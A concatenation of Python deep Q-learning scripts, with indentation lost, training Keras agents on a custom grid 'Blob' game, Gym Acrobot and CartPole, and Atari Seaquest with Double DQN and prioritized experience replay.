img = Image.fromarray(env, 'RGB') # reading to rgb. Apparently. Even tho color definitions are bgr. ???
return img
class DQNAgent:
def __init__(self, state_size, action_size):
self.state_size = state_size
self.action_size = action_size
self.memory = deque(maxlen=REPLAY_MEMORY_MAX)
# discount rate
self.gamma = 0.95
# exploration rate
self.epsilon = 1.0
self.epsilon_min = 0.01
self.epsilon_decay = 0.9997
self.learning_rate = 0.001
# models to be built
# Dual
self.model = self.build_model()
self.target_model = self.build_model()
self.update_target_model()
def build_model(self):
"""Builds the DQN Model"""
# Neural network for Deep-Q Learning Model
model = Sequential()
model.add(Conv2D(256, (3, 3), input_shape=self.state_size))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.2))
model.add(Conv2D(256, (3, 3)))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.2))
model.add(Flatten()) # this converts our 3D feature maps to 1D feature vectors
model.add(Dense(32))
# output layer
model.add(Dense(self.action_size, activation="linear"))
model.compile(loss="mse", optimizer=Adam(lr=self.learning_rate))
return model
def update_target_model(self):
"""Copy weights from self.model to self.target_model"""
self.target_model.set_weights(self.model.get_weights())
def remember(self, state, action, reward, next_state, done):
"""Adds a sample to the memory"""
# for images, expand dimension, comment if you are not using images as states
state = state / 255
next_state = next_state / 255
state = np.expand_dims(state, axis=0)
next_state = np.expand_dims(next_state, axis=0)
self.memory.append((state, action, reward, next_state, done))
def act(self, state):
"""Takes action using Epsilon-Greedy Policy"""
if np.random.random() <= self.epsilon:
return random.randint(0, self.action_size-1)
else:
state = state / 255
state = np.expand_dims(state, axis=0)
act_values = self.model.predict(state)
# print("act_values:", act_values.shape)
return np.argmax(act_values[0])
def replay(self, batch_size):
"""Train on a replay memory with a batch_size of samples"""
if len(self.memory) < MIN_REPLAY_MEMORY:
return
minibatch = random.sample(self.memory, batch_size)
for state, action, reward, next_state, done in minibatch:
target = reward
if not done:
target = ( reward + self.gamma * np.max(self.target_model.predict(next_state)[0]) )
target_f = self.model.predict(state)
target_f[0][action] = target
self.model.fit(state, target_f, epochs=1, verbose=0, batch_size=1)
# decay epsilon if possible
self.epsilon = max(self.epsilon * self.epsilon_decay, self.epsilon_min)
def load(self, name):
self.model.load_weights(name)
self.target_model.load_weights(name)
def save(self, name):
self.model.save_weights(name)
self.target_model.save_weights(name)
if __name__ == "__main__":
batch_size = 64
env = BlobEnv(GRID_SIZE)
agent = DQNAgent(env.OBSERVATION_SPACE_VALUES, ACTION_SIZE)
ep_rewards = deque([-200], maxlen=SHOW_EVERY)
avg_rewards = []
min_rewards = []
max_rewards = []
for episode in range(1, EPISODES+1):
# restarting episode => reset episode reward and step number
episode_reward = 0
step = 1
# reset env and get init state
current_state = env.reset()
done = False
while True:
# take action
action = agent.act(current_state)
next_state, reward, done = env.step(action)
episode_reward += reward
if episode % RENDER_EVERY == 0:
env.render()
# add transition to agent's memory
agent.remember(current_state, action, reward, next_state, done)
if step % LEARN_EVERY == 0:
agent.replay(batch_size=batch_size)
current_state = next_state
step += 1
if done:
agent.update_target_model()
break
ep_rewards.append(episode_reward)
avg_reward = np.mean(ep_rewards)
min_reward = min(ep_rewards)
max_reward = max(ep_rewards)
avg_rewards.append(avg_reward)
min_rewards.append(min_reward)
max_rewards.append(max_reward)
print(f"[{episode}] avg:{avg_reward:.2f} min:{min_reward} max:{max_reward} eps:{agent.epsilon:.4f}")
# if episode % SHOW_EVERY == 0:
# print(f"[{episode}] avg: {avg_reward} min: {min_reward} max: {max_reward} eps: {agent.epsilon:.4f}")
episodes = list(range(EPISODES))
plt.plot(episodes, avg_rewards, c='b')
plt.plot(episodes, min_rewards, c='r')
plt.plot(episodes, max_rewards, c='g')
plt.show()
agent.save("blob_v1.h5")
import os
# to use CPU uncomment below code
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=5,
inter_op_parallelism_threads=5,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
import random
import gym
import numpy as np
import matplotlib.pyplot as plt
from collections import deque
from keras.models import Sequential
from keras.layers import Dense
from keras.optimizers import Adam
EPISODES = 5_000
REPLAY_MEMORY_MAX = 2_000
SHOW_EVERY = 500
RENDER_EVERY = 1_000
class DQNAgent:
def __init__(self, state_size, action_size):
self.state_size = state_size
self.action_size = action_size
self.memory = deque(maxlen=REPLAY_MEMORY_MAX)
# discount rate
self.gamma = 0.95
# exploration rate
self.epsilon = 1.0
self.epsilon_min = 0.01
self.epsilon_decay = 0.9997
self.learning_rate = 0.001
# models to be built
# Dual
self.model = self.build_model()
self.target_model = self.build_model()
self.update_target_model()
def build_model(self):
"""Builds the DQN Model"""
# Neural network for Deep-Q Learning Model
model = Sequential()
model.add(Dense(32, input_dim=self.state_size, activation="relu"))
model.add(Dense(32, activation="relu"))
# output layer
model.add(Dense(self.action_size, activation="linear"))
model.compile(loss="mse", optimizer=Adam(lr=self.learning_rate))
return model
def update_target_model(self):
"""Copy weights from self.model to self.target_model"""
self.target_model.set_weights(self.model.get_weights())
def remember(self, state, action, reward, next_state, done):
"""Adds a sample to the memory"""
self.memory.append((state, action, reward, next_state, done))
def act(self, state):
"""Takes action using Epsilon-Greedy Policy"""
if np.random.random() <= self.epsilon:
return random.randint(0, self.action_size-1)
else:
act_values = self.model.predict(state)
# print("act_values:", act_values.shape)
return np.argmax(act_values[0])
def replay(self, batch_size):
"""Train on a replay memory with a batch_size of samples"""
minibatch = random.sample(self.memory, batch_size)
for state, action, reward, next_state, done in minibatch:
target = reward
if not done:
target = ( reward + self.gamma * np.max(self.target_model.predict(next_state)[0]) )
target_f = self.model.predict(state)
target_f[0][action] = target
self.model.fit(state, target_f, epochs=1, verbose=0)
# decay epsilon if possible
self.epsilon = max(self.epsilon * self.epsilon_decay, self.epsilon_min)
def load(self, name):
self.model.load_weights(name)
self.target_model.load_weights(name)
def save(self, name):
self.model.save_weights(name)
self.target_model.save_weights(name)
if __name__ == "__main__":
env = gym.make("Acrobot-v1")
state_size = env.observation_space.shape[0]
action_size = env.action_space.n
agent = DQNAgent(state_size=state_size, action_size=action_size)
# agent.load("AcroBot_v1.h5")
done = False
batch_size = 32
all_rewards = deque(maxlen=SHOW_EVERY)
avg_rewards = []
for e in range(EPISODES):
state = env.reset()
state = np.reshape(state, (1, state_size))
rewards = 0
while True:
action = agent.act(state)
# print(action)
next_state, reward, done, info = env.step(action)
# punish if not yet finished
# reward = reward if not done else 10
next_state = np.reshape(next_state, (1, state_size))
agent.remember(state, action, reward, next_state, done)
state = next_state
if done:
agent.update_target_model()
break
if e % RENDER_EVERY == 0:
env.render()
rewards += reward
# print(rewards)
all_rewards.append(rewards)
avg_reward = np.mean(all_rewards)
avg_rewards.append(avg_reward)
if e % SHOW_EVERY == 0:
print(f"[{e:4}] avg reward:{avg_reward:.3f} eps: {agent.epsilon:.2f}")
if len(agent.memory) > batch_size:
agent.replay(batch_size)
agent.save("AcroBot_v1.h5")
plt.plot(list(range(EPISODES)), avg_rewards)
plt.show()
import os
# to use CPU uncomment below code
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=5,
inter_op_parallelism_threads=5,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
import random
import gym
import numpy as np
import matplotlib.pyplot as plt
from collections import deque
from keras.models import Sequential
from keras.layers import Dense
from keras.optimizers import Adam
EPISODES = 1000
REPLAY_MEMORY_MAX = 5000
SHOW_EVERY = 100
class DQNAgent:
def __init__(self, state_size, action_size):
self.state_size = state_size
self.action_size = action_size
self.memory = deque(maxlen=REPLAY_MEMORY_MAX)
# discount rate
self.gamma = 0.95
# exploration rate
self.epsilon = 1.0
self.epsilon_min = 0.01
self.epsilon_decay = 0.995
self.learning_rate = 0.001
# model to be built
self.model = None
self.build_model()
def build_model(self):
"""Builds the DQN Model"""
# Neural network for Deep-Q Learning Model
model = Sequential()
model.add(Dense(24, input_dim=self.state_size, activation="relu"))
model.add(Dense(24, activation="relu"))
# output layer
model.add(Dense(self.action_size, activation="linear"))
model.compile(loss="mse", optimizer=Adam(lr=self.learning_rate))
self.model = model
def remember(self, state, action, reward, next_state, done):
"""Adds a sample to the memory"""
self.memory.append((state, action, reward, next_state, done))
def act(self, state):
"""Takes action using Epsilon-Greedy Policy"""
if np.random.random() <= self.epsilon:
return random.randint(0, self.action_size-1)
else:
act_values = self.model.predict(state)
# print("act_values:", act_values.shape)
return np.argmax(act_values[0])
def replay(self, batch_size):
"""Train on a replay memory with a batch_size of samples"""
minibatch = random.sample(self.memory, batch_size)
for state, action, reward, next_state, done in minibatch:
target = reward
if not done:
target = ( reward + self.gamma * np.max(self.model.predict(next_state)[0]) )
target_f = self.model.predict(state)
target_f[0][action] = target
self.model.fit(state, target_f, epochs=1, verbose=0)
# decay epsilon if possible
self.epsilon = max(self.epsilon * self.epsilon_decay, self.epsilon_min)
def load(self, name):
self.model.load_weights(name)
def save(self, name):
self.model.save_weights(name)
if __name__ == "__main__":
env = gym.make("CartPole-v1")
state_size = env.observation_space.shape[0]
action_size = env.action_space.n
agent = DQNAgent(state_size=state_size, action_size=action_size)
done = False
batch_size = 32
scores = []
avg_scores = []
avg_score = 0
for e in range(EPISODES):
state = env.reset()
state = np.reshape(state, (1, state_size))
for t in range(500):
action = agent.act(state)
# print(action)
next_state, reward, done, info = env.step(action)
# punish if not yet finished
reward = reward if not done else -10
next_state = np.reshape(next_state, (1, state_size))
agent.remember(state, action, reward, next_state, done)
state = next_state
if done:
print(f"[{e:4}] avg score:{avg_score:.3f} eps: {agent.epsilon:.2f}")
break
if e % SHOW_EVERY == 0:
env.render()
if len(agent.memory) > batch_size:
agent.replay(batch_size)
scores.append(t)
avg_score = np.average(scores)
avg_scores.append(avg_score)
agent.save("v1.h5")
plt.plot(list(range(EPISODES)), avg_scores)
plt.show()
import numpy as np
import keras.backend.tensorflow_backend as backend
from keras.models import Sequential
from keras.layers import Dense, Dropout, Conv2D, MaxPooling2D, Activation, Flatten, LSTM
from keras.optimizers import Adam
from keras.callbacks import TensorBoard
import tensorflow as tf
from collections import deque
import time
import random
from tqdm import tqdm
import os
from PIL import Image
import cv2
import itertools
DISCOUNT = 0.96
REPLAY_MEMORY_SIZE = 50_000 # How many last steps to keep for model training
MIN_REPLAY_MEMORY_SIZE = 1_000 # Minimum number of steps in a memory to start training
MINIBATCH_SIZE = 32 # How many steps (samples) to use for training
UPDATE_TARGET_EVERY = 5 # Terminal states (end of episodes)
MODEL_NAME = '3x128-LSTM-7enemies-'
MIN_REWARD = -200 # For model save
MEMORY_FRACTION = 0.20
# Environment settings
EPISODES = 50_000
# Exploration settings
epsilon = 1.0 # not a constant, going to be decayed
EPSILON_DECAY = 0.999771
MIN_EPSILON = 0.01
# Stats settings
AGGREGATE_STATS_EVERY = 100 # episodes
SHOW_PREVIEW = False
class Blob:
def __init__(self, size):
self.size = size
self.x = np.random.randint(0, size)
self.y = np.random.randint(0, size)
def __str__(self):
return f"Blob ({self.x}, {self.y})"
def __sub__(self, other):
return (self.x-other.x, self.y-other.y)
def __eq__(self, other):
return self.x == other.x and self.y == other.y
def action(self, choice):
'''
Gives us 9 total movement options. (0,1,2,3,4,5,6,7,8)
'''
if choice == 0:
self.move(x=1, y=0)
elif choice == 1:
self.move(x=-1, y=0)
elif choice == 2:
self.move(x=0, y=1)
elif choice == 3:
self.move(x=0, y=-1)
def move(self, x=False, y=False):
# If no value for x, move randomly
if x is False:
self.x += np.random.randint(-1, 2)
else:
self.x += x
# If no value for y, move randomly
if y is False:
self.y += np.random.randint(-1, 2)
else:
self.y += y
# If we are out of bounds, fix!
if self.x < 0:
self.x = 0
elif self.x > self.size-1:
self.x = self.size-1
if self.y < 0:
self.y = 0
elif self.y > self.size-1:
self.y = self.size-1
class BlobEnv:
SIZE = 20
RETURN_IMAGES = False
MOVE_PENALTY = 1
ENEMY_PENALTY = 300
FOOD_REWARD = 25
# if RETURN_IMAGES:
# OBSERVATION_SPACE_VALUES = (SIZE, SIZE, 3) # 4
# else:
# OBSERVATION_SPACE_VALUES = (4,)
ACTION_SPACE_SIZE = 4
PLAYER_N = 1 # player key in dict
FOOD_N = 2 # food key in dict
ENEMY_N = 3 # enemy key in dict
# the dict! (colors)
d = {1: (255, 175, 0),
2: (0, 255, 0),
3: (0, 0, 255)}
def __init__(self, n_enemies=7):
self.n_enemies = n_enemies
self.n_states = len(self.reset())
def reset(self):
self.enemies = []
self.player = Blob(self.SIZE)
self.food = Blob(self.SIZE)
while self.food == self.player:
self.food = Blob(self.SIZE)
for i in range(self.n_enemies):
enemy = Blob(self.SIZE)
while enemy == self.player or enemy == self.food:
enemy = Blob(self.SIZE)
self.enemies.append(enemy)
self.episode_step = 0
if self.RETURN_IMAGES:
observation = np.array(self.get_image())
else:
# all blob's coordinates
observation = [self.player.x, self.player.y, self.food.x, self.food.y] + list(itertools.chain(*[[e.x, e.y] for e in self.enemies]))
return observation
def step(self, action):
self.episode_step += 1
self.player.action(action)
#### MAYBE ###
#enemy.move()
#food.move()
##############
if self.RETURN_IMAGES:
new_observation = np.array(self.get_image())
else:
new_observation = [self.player.x, self.player.y, self.food.x, self.food.y] + list(itertools.chain(*[[e.x, e.y] for e in self.enemies]))
# set the reward to move penalty by default
reward = -self.MOVE_PENALTY
if self.player == self.food:
# if the player hits the food, good reward
reward = self.FOOD_REWARD
else:
for enemy in self.enemies:
if enemy == self.player:
# if the player hits one of the enemies, heavy punishment
reward = -self.ENEMY_PENALTY
break
done = False
if reward == self.FOOD_REWARD or reward == -self.ENEMY_PENALTY or self.episode_step >= 200:
done = True
return new_observation, reward, done
def render(self):
img = self.get_image()
img = img.resize((300, 300)) # resizing so we can see our agent in all its glory.
cv2.imshow("image", np.array(img)) # show it!
cv2.waitKey(1)
# FOR CNN #
def get_image(self):
env = np.zeros((self.SIZE, self.SIZE, 3), dtype=np.uint8) # starts an rbg of our size
env[self.food.x][self.food.y] = self.d[self.FOOD_N] # sets the food location tile to green color
for enemy in self.enemies:
env[enemy.x][enemy.y] = self.d[ENEMY_N] # sets the enemy location to red
env[self.player.x][self.player.y] = self.d[self.PLAYER_N] # sets the player tile to blue
img = Image.fromarray(env, 'RGB') # reading to rgb. Apparently. Even tho color definitions are bgr. ???
return img
env = BlobEnv()
# For stats
ep_rewards = [-200]
# For more repetitive results
random.seed(1)
np.random.seed(1)
tf.set_random_seed(1)
# Memory fraction, used mostly when trai8ning multiple agents
#gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=MEMORY_FRACTION)
#backend.set_session(tf.Session(config=tf.ConfigProto(gpu_options=gpu_options)))
# Create models folder
if not os.path.isdir('models'):
os.makedirs('models')
# Own Tensorboard class
class ModifiedTensorBoard(TensorBoard):
# Overriding init to set initial step and writer (we want one log file for all .fit() calls)
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.step = 1
self.writer = tf.summary.FileWriter(self.log_dir)
# Overriding this method to stop creating default log writer
def set_model(self, model):
pass
# Overrided, saves logs with our step number
# (otherwise every .fit() will start writing from 0th step)
def on_epoch_end(self, epoch, logs=None):
self.update_stats(**logs)
# Overrided
# We train for one batch only, no need to save anything at epoch end
def on_batch_end(self, batch, logs=None):
pass
# Overrided, so won't close writer
def on_train_end(self, _):
pass
# Custom method for saving own metrics
# Creates writer, writes custom metrics and closes writer
def update_stats(self, **stats):
self._write_logs(stats, self.step)
# Agent class
class DQNAgent:
def __init__(self, state_in_image=True):
self.state_in_image = state_in_image
# Main model
self.model = self.create_model()
# Target network
self.target_model = self.create_model()
self.target_model.set_weights(self.model.get_weights())
# An array with last n steps for training
self.replay_memory = deque(maxlen=REPLAY_MEMORY_SIZE)
# Custom tensorboard object
self.tensorboard = ModifiedTensorBoard(log_dir="logs/{}-{}".format(MODEL_NAME, int(time.time())))
# Used to count when to update target network with main network's weights
self.target_update_counter = 0
def create_model(self):
# get the NN input length
model = Sequential()
if self.state_in_image:
model.add(Conv2D(256, (3, 3), input_shape=env.OBSERVATION_SPACE_VALUES)) # OBSERVATION_SPACE_VALUES = (10, 10, 3) a 10x10 RGB image.
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.2))
model.add(Conv2D(256, (3, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.2))
model.add(Flatten()) # this converts our 3D feature maps to 1D feature vectors
model.add(Dense(32))
else:
# model.add(Dense(32, activation="relu", input_shape=(env.n_states,)))
# model.add(Dense(32, activation="relu"))
# model.add(Dropout(0.2))
# model.add(Dense(32, activation="relu"))
# model.add(Dropout(0.2))
model.add(LSTM(128, activation="relu", input_shape=(None, env.n_states,), return_sequences=True))
model.add(Dropout(0.3))
model.add(LSTM(128, activation="relu", return_sequences=True))
model.add(Dropout(0.3))
model.add(LSTM(128, activation="relu", return_sequences=False))
model.add(Dropout(0.3))
model.add(Dense(env.ACTION_SPACE_SIZE, activation='linear')) # ACTION_SPACE_SIZE = how many choices (9)
model.compile(loss="mse", optimizer=Adam(lr=0.001), metrics=['accuracy'])
return model
# Adds step's data to a memory replay array
# (observation space, action, reward, new observation space, done)
def update_replay_memory(self, transition):
self.replay_memory.append(transition)
# Trains main network every step during episode
def train(self, terminal_state, step):
# Start training only if certain number of samples is already saved
if len(self.replay_memory) < MIN_REPLAY_MEMORY_SIZE:
return
# Get a minibatch of random samples from memory replay table
minibatch = random.sample(self.replay_memory, MINIBATCH_SIZE)
# Get current states from minibatch, then query NN model for Q values
if self.state_in_image:
current_states = np.array([transition[0] for transition in minibatch])/255
else:
current_states = np.array([transition[0] for transition in minibatch])
current_qs_list = self.model.predict(np.expand_dims(current_states, axis=1))
# Get future states from minibatch, then query NN model for Q values
# When using target network, query it, otherwise main network should be queried
if self.state_in_image:
new_current_states = np.array([transition[3] for transition in minibatch])/255
else:
new_current_states = np.array([transition[3] for transition in minibatch])
future_qs_list = self.target_model.predict(np.expand_dims(new_current_states, axis=1))
X = []
y = []
# Now we need to enumerate our batches
for index, (current_state, action, reward, new_current_state, done) in enumerate(minibatch):
# If not a terminal state, get new q from future states, otherwise set it to 0
# almost like with Q Learning, but we use just part of equation here
if not done:
max_future_q = np.max(future_qs_list[index])
new_q = reward + DISCOUNT * max_future_q
else:
new_q = reward
# Update Q value for given state
current_qs = current_qs_list[index]
current_qs[action] = new_q
# And append to our training data
X.append(current_state)
y.append(current_qs)
# Fit on all samples as one batch, log only on terminal state
if self.state_in_image:
self.model.fit(np.array(X)/255, np.array(y), batch_size=MINIBATCH_SIZE, verbose=0, shuffle=False, callbacks=[self.tensorboard] if terminal_state else None)
else:
# self.model.fit(np.array(X), np.array(y), batch_size=MINIBATCH_SIZE, verbose=0, shuffle=False, callbacks=[self.tensorboard] if terminal_state else None)
self.model.fit(np.expand_dims(X, axis=1), np.array(y), batch_size=MINIBATCH_SIZE, verbose=0, shuffle=False, callbacks=[self.tensorboard] if terminal_state else None)
# Update target network counter every episode
if terminal_state:
self.target_update_counter += 1
# If counter reaches set value, update target network with weights of main network
if self.target_update_counter > UPDATE_TARGET_EVERY:
self.target_model.set_weights(self.model.get_weights())
self.target_update_counter = 0
# Queries main network for Q values given current observation space (environment state)
def get_qs(self, state):
if self.state_in_image:
return self.model.predict(np.array(state).reshape(-1, *state.shape)/255)[0]
else:
# return self.model.predict(np.array(state).reshape(1, env.n_states))[0]
return self.model.predict(np.array(state).reshape(1, 1, env.n_states))[0]
agent = DQNAgent(state_in_image=False)
print("Number of states:", env.n_states)
# agent.model.load_weights("models/2x32____22.00max___-2.44avg_-200.00min__1563463022.model")
# Iterate over episodes
for episode in tqdm(range(1, EPISODES + 1), ascii=True, unit='episodes'):
# Update tensorboard step every episode
agent.tensorboard.step = episode
# Restarting episode - reset episode reward and step number
episode_reward = 0
step = 1
# Reset environment and get initial state
current_state = env.reset()
# Reset flag and start iterating until episode ends
done = False
while not done:
# This part stays mostly the same, the change is to query a model for Q values
if np.random.random() > epsilon:
# Get action from Q table
action = np.argmax(agent.get_qs(current_state))
else:
# Get random action
action = np.random.randint(0, env.ACTION_SPACE_SIZE)
new_state, reward, done = env.step(action)
# Transform new continous state to new discrete state and count reward
episode_reward += reward
if SHOW_PREVIEW and not episode % AGGREGATE_STATS_EVERY:
env.render()
# Every step we update replay memory and train main network
agent.update_replay_memory((current_state, action, reward, new_state, done))
agent.train(done, step)
current_state = new_state
step += 1
# Append episode reward to a list and log stats (every given number of episodes)
ep_rewards.append(episode_reward)
if not episode % AGGREGATE_STATS_EVERY or episode == 1:
average_reward = sum(ep_rewards[-AGGREGATE_STATS_EVERY:])/len(ep_rewards[-AGGREGATE_STATS_EVERY:])
min_reward = min(ep_rewards[-AGGREGATE_STATS_EVERY:])
max_reward = max(ep_rewards[-AGGREGATE_STATS_EVERY:])
agent.tensorboard.update_stats(reward_avg=average_reward, reward_min=min_reward, reward_max=max_reward, epsilon=epsilon)
# Save model, but only when min reward is greater or equal a set value
if average_reward >= -220:
agent.model.save(f'models/{MODEL_NAME}__{max_reward:_>7.2f}max_{average_reward:_>7.2f}avg_{min_reward:_>7.2f}min__{int(time.time())}.model')
# Decay epsilon
if epsilon > MIN_EPSILON:
epsilon *= EPSILON_DECAY
epsilon = max(MIN_EPSILON, epsilon)
agent.model.save(f'models/{MODEL_NAME}__{max_reward:_>7.2f}max_{average_reward:_>7.2f}avg_{min_reward:_>7.2f}min__{int(time.time())}.model')
# OpenGym Seaquest-v0
# -------------------
#
# This code demonstrates a Double DQN network with Priority Experience Replay
# in an OpenGym Seaquest-v0 environment.
#
# Made as part of blog series Let's make a DQN, available at:
# https://jaromiru.com/2016/11/07/lets-make-a-dqn-double-learning-and-prioritized-experience-replay/
#
# author: Jaromir Janisch, 2016
import matplotlib
import random, numpy, math, gym, scipy
import tensorflow as tf
import time
from SumTree import SumTree
from keras.callbacks import TensorBoard
from collections import deque
import tqdm
IMAGE_WIDTH = 84
IMAGE_HEIGHT = 84
IMAGE_STACK = 2
HUBER_LOSS_DELTA = 2.0
LEARNING_RATE = 0.00045
#-------------------- Modified Tensorboard -----------------------
class RLTensorBoard(TensorBoard):
def __init__(self, **kwargs):
"""
Overriding init to set initial step and writer (one log file for multiple .fit() calls)
"""
super().__init__(**kwargs)
self.step = 1
self.writer = tf.summary.FileWriter(self.log_dir)
def set_model(self, model):
"""
Overriding this method to stop creating default log writer
"""
pass
def on_epoch_end(self, epoch, logs=None):
"""
Overrided, saves logs with our step number
(if this is not overrided, every .fit() call will start from 0th step)
"""
self.update_stats(**logs)
def on_batch_end(self, batch, logs=None):
"""
Overrided, we train for one batch only, no need to save anything on batch end
"""
pass
def on_train_end(self, _):
"""
Overrided, we don't close the writer
"""
pass
def update_stats(self, **stats):
"""
Custom method for saving own metrics
Creates writer, writes custom metrics and closes writer
"""
self._write_logs(stats, self.step)
#-------------------- UTILITIES -----------------------
def huber_loss(y_true, y_pred):
err = y_true - y_pred
cond = K.abs(err) < HUBER_LOSS_DELTA
L2 = 0.5 * K.square(err)
L1 = HUBER_LOSS_DELTA * (K.abs(err) - 0.5 * HUBER_LOSS_DELTA)
loss = tf.where(cond, L2, L1) # Keras does not cover where function in tensorflow :-(
return K.mean(loss)
def processImage( img ):
rgb = scipy.misc.imresize(img, (IMAGE_WIDTH, IMAGE_HEIGHT), interp='bilinear')
r, g, b = rgb[:,:,0], rgb[:,:,1], rgb[:,:,2]
gray = 0.2989 * r + 0.5870 * g + 0.1140 * b # extract luminance
o = gray.astype('float32') / 128 - 1 # normalize
return o
#-------------------- BRAIN ---------------------------
from keras.models import Sequential
from keras.layers import *
from keras.optimizers import *
model_name = "conv2dx3"
class Brain:
def __init__(self, stateCnt, actionCnt):
self.stateCnt = stateCnt
self.actionCnt = actionCnt
self.model = self._createModel()
self.model_ = self._createModel() # target network
# custom tensorboard
self.tensorboard = RLTensorBoard(log_dir="logs/{}-{}".format(model_name, int(time.time())))
def _createModel(self):
model = Sequential()
model.add(Conv2D(32, (8, 8), strides=(4,4), activation='relu', input_shape=(self.stateCnt), data_format='channels_first'))
model.add(Conv2D(64, (4, 4), strides=(2,2), activation='relu'))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(Flatten())
model.add(Dense(units=512, activation='relu'))
model.add(Dense(units=actionCnt, activation='linear'))
opt = RMSprop(lr=LEARNING_RATE)
model.compile(loss=huber_loss, optimizer=opt)
return model
def train(self, x, y, epochs=1, verbose=0):
self.model.fit(x, y, batch_size=32, epochs=epochs, verbose=verbose, callbacks=[self.tensorboard])
def predict(self, s, target=False):
if target:
return self.model_.predict(s)
else:
return self.model.predict(s)
def predictOne(self, s, target=False):
return self.predict(s.reshape(1, IMAGE_STACK, IMAGE_WIDTH, IMAGE_HEIGHT), target).flatten()
def updateTargetModel(self):
self.model_.set_weights(self.model.get_weights())
#-------------------- MEMORY --------------------------
class Memory: # stored as ( s, a, r, s_ ) in SumTree
e = 0.01
a = 0.6
def __init__(self, capacity):
self.tree = SumTree(capacity)
def _getPriority(self, error):
return (error + self.e) ** self.a
def add(self, error, sample):
p = self._getPriority(error)
self.tree.add(p, sample)
def sample(self, n):
batch = []
segment = self.tree.total() / n
for i in range(n):
a = segment * i
b = segment * (i + 1)
s = random.uniform(a, b)
(idx, p, data) = self.tree.get(s)
batch.append( (idx, data) )
return batch
def update(self, idx, error):
p = self._getPriority(error)
self.tree.update(idx, p)
#-------------------- AGENT ---------------------------
MEMORY_CAPACITY = 50_000
BATCH_SIZE = 32
GAMMA = 0.95
MAX_EPSILON = 1
MIN_EPSILON = 0.05
EXPLORATION_STOP = 500_000 # at this step epsilon will be 0.01
LAMBDA = - math.log(0.01) / EXPLORATION_STOP # speed of decay
UPDATE_TARGET_FREQUENCY = 10_000
UPDATE_STATS_EVERY = 5
RENDER_EVERY = 50
class Agent:
steps = 0
epsilon = MAX_EPSILON
def __init__(self, stateCnt, actionCnt, brain):
self.stateCnt = stateCnt
self.actionCnt = actionCnt
self.brain = brain
# self.memory = Memory(MEMORY_CAPACITY)
def act(self, s):
if random.random() < self.epsilon:
return random.randint(0, self.actionCnt-1)
else:
return numpy.argmax(self.brain.predictOne(s))
def observe(self, sample): # in (s, a, r, s_) format
x, y, errors = self._getTargets([(0, sample)])
self.memory.add(errors[0], sample)
if self.steps % UPDATE_TARGET_FREQUENCY == 0:
self.brain.updateTargetModel()
# slowly decrease Epsilon based on our eperience
self.steps += 1
self.epsilon = MIN_EPSILON + (MAX_EPSILON - MIN_EPSILON) * math.exp(-LAMBDA * self.steps)
def _getTargets(self, batch):
no_state = numpy.zeros(self.stateCnt)
states = numpy.array([ o[1][0] for o in batch ])
states_ = numpy.array([ (no_state if o[1][3] is None else o[1][3]) for o in batch ])
p = agent.brain.predict(states)
p_ = agent.brain.predict(states_, target=False)
pTarget_ = agent.brain.predict(states_, target=True)
x = numpy.zeros((len(batch), IMAGE_STACK, IMAGE_WIDTH, IMAGE_HEIGHT))
y = numpy.zeros((len(batch), self.actionCnt))
errors = numpy.zeros(len(batch))
for i in range(len(batch)):
o = batch[i][1]
s = o[0] a = o[1] r = o[2] s_ = o[3]
t = p[i]
oldVal = t[a]
if s_ is None:
t[a] = r
else:
t[a] = r + GAMMA * pTarget_[i][ numpy.argmax(p_[i]) ] # double DQN
x[i] = s
y[i] = t
errors[i] = abs(oldVal - t[a])
return (x, y, errors)
def replay(self):
batch = self.memory.sample(BATCH_SIZE)
x, y, errors = self._getTargets(batch)
# update errors
for i in range(len(batch)):
idx = batch[i][0]
self.memory.update(idx, errors[i])
self.brain.train(x, y)
class RandomAgent:
memory = Memory(MEMORY_CAPACITY)
exp = 0
epsilon = MAX_EPSILON
def __init__(self, actionCnt, brain):
self.actionCnt = actionCnt
self.brain = brain
def act(self, s):
return random.randint(0, self.actionCnt-1)
def observe(self, sample): # in (s, a, r, s_) format
error = abs(sample[2]) # reward
self.memory.add(error, sample)
self.exp += 1
def replay(self):
pass
#-------------------- ENVIRONMENT ---------------------
class Environment:
def __init__(self, problem):
self.problem = problem
self.env = gym.make(problem)
self.ep_rewards = deque(maxlen=UPDATE_STATS_EVERY)
def run(self, agent, step):
img = self.env.reset()
w = processImage(img)
s = numpy.array([w, w])
agent.brain.tensorboard.step = step
R = 0
while True:
if step % RENDER_EVERY == 0:
self.env.render()
a = agent.act(s)
img, r, done, info = self.env.step(a)
s_ = numpy.array([s[1], processImage(img)]) #last two screens
r = np.clip(r, -1, 1) # clip reward to [-1, 1]
if done: # terminal state
s_ = None
agent.observe( (s, a, r, s_) )
agent.replay()
s = s_
R += r
if done:
break
self.ep_rewards.append(R)
avg_reward = sum(self.ep_rewards) / len(self.ep_rewards)
if step % UPDATE_STATS_EVERY == 0:
min_reward = min(self.ep_rewards)
max_reward = max(self.ep_rewards)
agent.brain.tensorboard.update_stats(reward_avg=avg_reward, reward_min=min_reward, reward_max=max_reward, epsilon=agent.epsilon)
agent.brain.model.save(f"models/{model_name}-avg-{avg_reward:.2f}-min-{min_reward:.2f}-max-{max_reward:2f}.h5")
# print("Total reward:", R)
return avg_reward
#-------------------- MAIN ----------------------------
PROBLEM = 'Seaquest-v0'
env = Environment(PROBLEM)
episodes = 2_000
stateCnt = (IMAGE_STACK, IMAGE_WIDTH, IMAGE_HEIGHT)
actionCnt = env.env.action_space.n
brain = Brain(stateCnt, actionCnt)
agent = Agent(stateCnt, actionCnt, brain)
